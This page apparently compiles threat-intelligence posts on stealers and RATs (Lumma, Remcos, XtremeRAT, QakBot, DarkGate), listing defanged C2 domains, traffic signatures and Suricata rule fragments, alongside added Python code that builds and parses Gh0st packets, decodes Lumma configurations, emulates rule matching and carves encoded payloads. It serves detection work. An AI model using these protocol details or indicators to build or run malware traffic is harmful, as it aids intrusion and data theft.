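    return struct.pack(HEADER_FMT, magic, HEADER_LEN + len(comp), len(plaintext)) + comp


def parse_packet(packet: bytes, magic: bytes = DEFAULT_MAGIC) -> bytes:
    """Return the inflated body or raise ValueError on any header/body inconsistency."""
    if len(packet) < HEADER_LEN:
        raise ValueError("short packet")
    m, total, inflated = struct.unpack_from(HEADER_FMT, packet, 0)
    if m != magic:
        raise ValueError("magic mismatch")
    if total != len(packet):
        raise ValueError(f"size field {total} != {len(packet)} bytes")
    body = packet[HEADER_LEN:]
    if body[:1] != b"\x78":                # zlib CMF byte: deflate with 32K window
        raise ValueError("body is not a zlib stream")
    data = zlib.decompress(body)
    if len(data) != inflated:
        raise ValueError("inflated size field disagrees with data")
    return data


def is_gh0st(packet: bytes, magic: bytes = DEFAULT_MAGIC) -> bool:
    """Detector form of parse_packet: all three header fields must agree with the body."""
    try:
        parse_packet(packet, magic)
        return True
    except (ValueError, zlib.error):
        return False


def split_stream(stream: bytes, magic: bytes = DEFAULT_MAGIC):
    """Cut a reassembled TCP stream into inflated packets using the size field."""
    out, pos = [], 0
    while pos + HEADER_LEN <= len(stream):
        total = struct.unpack_from("<I", stream, pos + len(magic))[0]
        if total < HEADER_LEN or pos + total > len(stream):
            raise ValueError("truncated or corrupt packet")
        out.append(parse_packet(stream[pos:pos + total], magic))
        pos += total
    return out


if __name__ == "__main__":
    pkt = build_packet(b"\x65constructed-checkin")
    print(pkt.hex(), parse_packet(pkt))
```

When a variant replaces the magic, the two size fields and the 0x78 zlib byte at offset 13 still line up, which is why the post keys on buffer sizes rather than the magic alone.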
@Jane_0sint
Jane
3 years
[STEALER`s LOADER] Win32:PWSX-gen😳 DL: sqlite.dll, sqlite.dat TCP: toa.mygametoa[.]com TLS: bh.mygameagend[.]com TLS: fg.mygameagend[.]com IP Check: ip-api[.]com Static Bytes (Yellow), Size (Red). If there is an attribution, you're welcome!😋
@Jane_0sint
Jane
1 year
⚡️Payload Encryption Update 🔍sid: 8000993 - use a filter! 💪You can find these threats⏬ #AgentTesla *⃣ #Quasar *⃣ 📂All of them are in opendir, here is the taglink. #⃣
@Jane_0sint
Jane
1 year
#Lumma Stealer now loads a 32-byte XOR encrypted configuration using the /c2conf URI🔐 🥚The Easter egg is to pass the key in the first bytes in the clear✨ 🫶Thanks to the guys from for the analysis on the link! ➡️
@ET_Labs
ET Labs
1 year
21 new OPEN, 24 new PRO (21 + 3) Lumma Stealer, Blackmoon, SocGholish Thanks @Jane_0sint
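Added example, not ANY.RUN's CyberChef recipe or the author's decoder: decode a Lumma /c2conf response as the two posts describe it, Base64 over a 32-byte XOR key sent in the clear followed by the XOR-encrypted configuration. The exact layout (key first, then ciphertext, key cycled) is an assumption drawn from "pass the key in the first bytes"; the sample configuration and its endpoint are constructed.

```python
"""Lumma /c2conf decoder under the key-prefix assumption described in the lead-in."""
import base64
import json
from itertools import cycle

KEY_LEN = 32


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key repeated as needed."""
    return bytes(a ^ b for a, b in zip(data, cycle(key)))


def encode_c2conf(config: bytes, key: bytes) -> str:
    """Produce a response in the assumed layout, used here only to build test input."""
    if len(key) != KEY_LEN:
        raise ValueError("key must be 32 bytes")
    return base64.b64encode(key + xor_bytes(config, key)).decode("ascii")


def decode_c2conf(body: str) -> bytes:
    """Base64-decode, split off the 32-byte clear key, XOR the remainder."""
    raw = base64.b64decode("".join(body.split()), validate=True)
    if len(raw) <= KEY_LEN:
        raise ValueError("response shorter than key + ciphertext")
    key, ciphertext = raw[:KEY_LEN], raw[KEY_LEN:]
    return xor_bytes(ciphertext, key)


def decode_c2conf_json(body: str):
    """Decode and parse; a JSON failure is the signal that this layout does not fit the sample."""
    return json.loads(decode_c2conf(body).decode("utf-8"))


if __name__ == "__main__":
    cfg = b'{"v":4,"c2":["198.51.100.7"],"av":false}'   # constructed, not a real config
    body = encode_c2conf(cfg, bytes(range(100, 132)))
    print(body)
    print(decode_c2conf_json(body))
```

The first 32 bytes of the decoded blob are also the cheapest thing to write a rule against: they are high-entropy and never repeat across the rest of the response, unlike the XOR-ed JSON that follows.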
@Jane_0sint
Jane
3 years
Can you help me to attribute this? I see fake HTTP traffic: GET /favicon.ico HTTP/1.1 + data (to_server & to_client) Strange naming - svchosl.exe & winlogoc.exe (), data structure in which the server responded as a client😲
@Jane_0sint
Jane
1 year
📧 If you see the triggering of rule 8000065 ⚡️ This means that a TLS stream containing a message body of a certain length was found in the sequence of SMTP protocol packets 🔍 It's not just a mail protocol detector📧
@Jane_0sint
Jane
10 months
👩🏼‍🍳Complete your recipes with one more made with love especially for you🫶 🤔Follow the link to find out more about the rule : 2048558 - ET MALWARE [] DarkGate Check-In HTTP Header (POST)↘️
@anyrun_app
ANY.RUN
10 months
📌 #DarkGate Loader downloads an encrypted payload 🔓Decrypt the payload using #CyberChef Follow the instructions: 1⃣ Take the DarkGate sample in ANYRUN ➡️ 2⃣ Download the received encrypted data marked by the rule: ☑️ PAYLOAD []
@Jane_0sint
Jane
1 year
✨New Spyware✨ Kill Switch is the pakistan.txt file. elinline[.]com cachecast001[.]com
@Jane_0sint
Jane
1 year
💡In addition to tags, you can also filter by rules with the following numbers: 2036955, 2036934, 2854151, 2854152. And also for hunting, use other numbers: 2036884, 2044301, 8000094, 2044305 Happy raccoon hunting🦝
@anyrun_app
ANY.RUN
1 year
#Raccoon stealer is still popular This #malware is known for stealing sensitive data from victims. Raccoon's scheme of work is similar to many others and consists of 3 main stages: 🟩 - Configuration 🟪 - Loading 🟦 - Exfiltration Read more 👉
@Jane_0sint
Jane
3 years
[REMOTE] XtremeRAT 🐭 Constants: Constant for new connection "myversion". In order not to rely on constants for detection it is better to use the server response.🎈 == IDS == stream_size: server, =, 4; dsize: 3; content: "|580d0a|";
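Added example, not Suricata and not the author's rules in full: a small emulator of the content modifiers used in the three rule fragments posted on this page (the Remcos TLS 1.3 ClientHello fragment with depth/distance/within, the Remcos check-in fragment with startswith/distance/within, and the XtremeRAT server response with dsize), run against hand-built payloads. stream_size is not emulated; the 160-byte constructed ClientHello is simply consistent with the posted stream_size of 161, and its 32 "random" bytes are a counter, not a capture.

```python
"""Emulation of Suricata content modifiers: depth, startswith, distance, within, dsize."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Content:
    pattern: bytes
    depth: Optional[int] = None     # absolute: match must end within the first N bytes
    distance: Optional[int] = None  # relative: start searching N bytes after previous match end
    within: Optional[int] = None    # relative: match must end within N bytes of (prev end + distance)
    startswith: bool = False        # pattern must sit at offset 0 of the payload


@dataclass
class Rule:
    contents: List[Content]
    dsize: Optional[int] = None     # exact payload size, if the rule specifies one


def _search(buf: bytes, c: Content, prev_end: int) -> int:
    """Offset of a match that honours c's modifiers, or -1."""
    if c.startswith:
        return 0 if buf.startswith(c.pattern) else -1
    if c.distance is not None or c.within is not None:
        # Relative match: the window opens after the previous match plus distance;
        # with 'within' it is capped so the whole pattern must end inside it.
        start = prev_end + (c.distance or 0)
        end = start + c.within if c.within is not None else len(buf)
    else:
        start = 0
        end = c.depth if c.depth is not None else len(buf)
    end = min(end, len(buf))
    if end - start < len(c.pattern):
        return -1
    return buf.find(c.pattern, start, end)


def match_rule(buf: bytes, rule: Rule) -> bool:
    """Apply dsize and the ordered content matches to one payload."""
    if rule.dsize is not None and len(buf) != rule.dsize:
        return False
    prev_end = 0
    for c in rule.contents:
        pos = _search(buf, c, prev_end)
        if pos < 0:
            return False
        prev_end = pos + len(c.pattern)
    return True


# The three fragments from the posts, transcribed as structured rules.
REMCOS_TLS13_HELLO = Rule(contents=[
    Content(bytes.fromhex("160303009b010000970303"), depth=11),
    Content(bytes.fromhex("00000213010100006c0033004700450017004104"), distance=32, within=20),
])
REMCOS_CHECKIN = Rule(contents=[
    Content(bytes.fromhex("BA49B23C5E7E694328638E"), startswith=True),
    Content(bytes.fromhex("3984"), distance=2, within=2),
])
XTREMERAT_SERVER_RESPONSE = Rule(contents=[Content(b"X\r\n")], dsize=3)


def build_remcos_client_hello(random_len: int = 32) -> bytes:
    """Constructed payload: record + handshake header, a 32-byte placeholder random,
    the 20 static bytes, padded to 160 bytes. Any other random_len shifts the static
    bytes out of the within window and must break the match."""
    head = bytes.fromhex("160303009b010000970303")
    body = bytes.fromhex("00000213010100006c0033004700450017004104")
    return (head + bytes(range(random_len)) + body).ljust(160, b"\x00")


if __name__ == "__main__":
    magic = bytes.fromhex("BA49B23C5E7E694328638E")
    print("remcos tls     :", match_rule(build_remcos_client_hello(), REMCOS_TLS13_HELLO))
    print("remcos check-in:", match_rule(magic + b"\x00\x01\x39\x84", REMCOS_CHECKIN))
    print("xtremerat      :", match_rule(b"X\r\n", XTREMERAT_SERVER_RESPONSE))
```

Note why distance:32; within:20 pins a 20-byte pattern to exactly one offset: the window runs from previous-end + 32 for 20 bytes, so the 20-byte content can only start at previous-end + 32, which is where the ClientHello's session-id length byte follows the 32-byte random.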
@Jane_0sint
Jane
10 months
#Pegasus =+=+=+=+= #Ransomware No. The Pegasus doesn't make deals #Wiper =+=+=+=+= [JAR - encryptAes.class]
@Jane_0sint
Jane
3 years
[SPYWARE] QakBot SOCKS5 protocol is encapsulated in QakBot proxy protocol. Thx @malware_traffic & Technical analysis of the QakBot banking Trojan @securelist_ru <Type + Ver + SesID + Size> Hello packet static bytes (516)🌸
@Unit42_Intel
Unit 42
3 years
2021-10-07 (Thursday) - #Qakbot ( #Qbot ) infection with #CobaltStrike and #ANGRYPUPPY / #BloodHound reconnaissance activity - IOCs with link to malware/artifact samples (and link to more info about ANGRYPUPPY) available at:
@Jane_0sint
Jane
10 months
JPEG ⏭️ <<BASE64_START>> ⏭️ Payload
@anyrun_app
ANY.RUN
11 months
🕵️ A #stego campaign weaponizes images to drop malware An ongoing #phishing campaign is delivering payloads through images with embedded Base64-encoded MZ files. So far, we have observed the use of #AgentTesla , #Asyncrat , #Dtloader , #Remcos and #NjRAT being downloaded using
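Added example covering three payload encodings that appear on this page: the PE written out as a string of zeros and ones (the "[PAYLOAD] Encoded PE EXE or DLL" post), the Base64 MZ blob appended to a JPEG after a <<BASE64_START>> marker (the stego posts directly above), and the single-byte XOR 0x0A MSI container from the RMSRemoteAdmin post. The decoders and the magic check are mine, not the author's or ANY.RUN's; every input is constructed, and the fake PE and MSI headers are placeholders, not samples.

```python
"""Carving and decoding text-encoded payloads, then checking the result's file magic."""
import base64
import re
import struct

CFB_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")   # OLE compound file header, i.e. an MSI


def decode_bit_string(text: str) -> bytes:
    """'01001101 01011010 ...' -> b'MZ...'; whitespace and other noise are ignored."""
    bits = re.sub(r"[^01]", "", text)
    if not bits or len(bits) % 8:
        raise ValueError("bit count is not a multiple of 8")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def carve_base64_after_marker(blob: bytes, marker: bytes = b"<<BASE64_START>>"):
    """Decode the Base64 run that follows the marker, or return None."""
    idx = blob.find(marker)
    if idx < 0:
        return None
    m = re.match(rb"[A-Za-z0-9+/=\r\n]+", blob[idx + len(marker):])
    if not m:
        return None
    b64 = re.sub(rb"\s", b"", m.group(0))
    b64 += b"=" * (-len(b64) % 4)               # tolerate stripped padding
    return base64.b64decode(b64)


def xor_single_byte(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def identify(data: bytes) -> str:
    """File-type check: a PE needs both 'MZ' and 'PE\\0\\0' at e_lfanew; MSI is CFB."""
    if data[:2] == b"MZ" and len(data) >= 64:
        e_lfanew = struct.unpack_from("<I", data, 60)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "PE"
    if data[:8] == CFB_MAGIC:
        return "CFB/MSI"
    return "unknown"


def brute_single_byte_xor(data: bytes):
    """Every key whose XOR of the blob's head yields a recognised header."""
    hits = []
    for key in range(256):
        kind = identify(xor_single_byte(data[:4096], key))
        if kind != "unknown":
            hits.append((key, kind))
    return hits


def fake_pe() -> bytes:
    """Constructed 84-byte stand-in: MZ header with e_lfanew = 64 pointing at 'PE\\0\\0'."""
    return b"MZ" + bytes(58) + struct.pack("<I", 64) + b"PE\x00\x00" + bytes(16)


def build_stego_jpeg(payload: bytes) -> bytes:
    """Constructed carrier: JPEG-looking prefix, the marker, Base64 payload, JPEG EOI."""
    return b"\xff\xd8\xff\xe0JFIF-placeholder<<BASE64_START>>" + base64.b64encode(payload) + b"\xff\xd9"


if __name__ == "__main__":
    print(decode_bit_string("01001101 01011010"))
    print(identify(carve_base64_after_marker(build_stego_jpeg(fake_pe()))))
    print(brute_single_byte_xor(xor_single_byte(CFB_MAGIC + bytes(24), 0x0A)))
```

Requiring the PE\0\0 signature rather than "MZ" alone matters for the XOR brute force: two bytes give a one-in-65536 chance of a spurious key per candidate, the full header check does not.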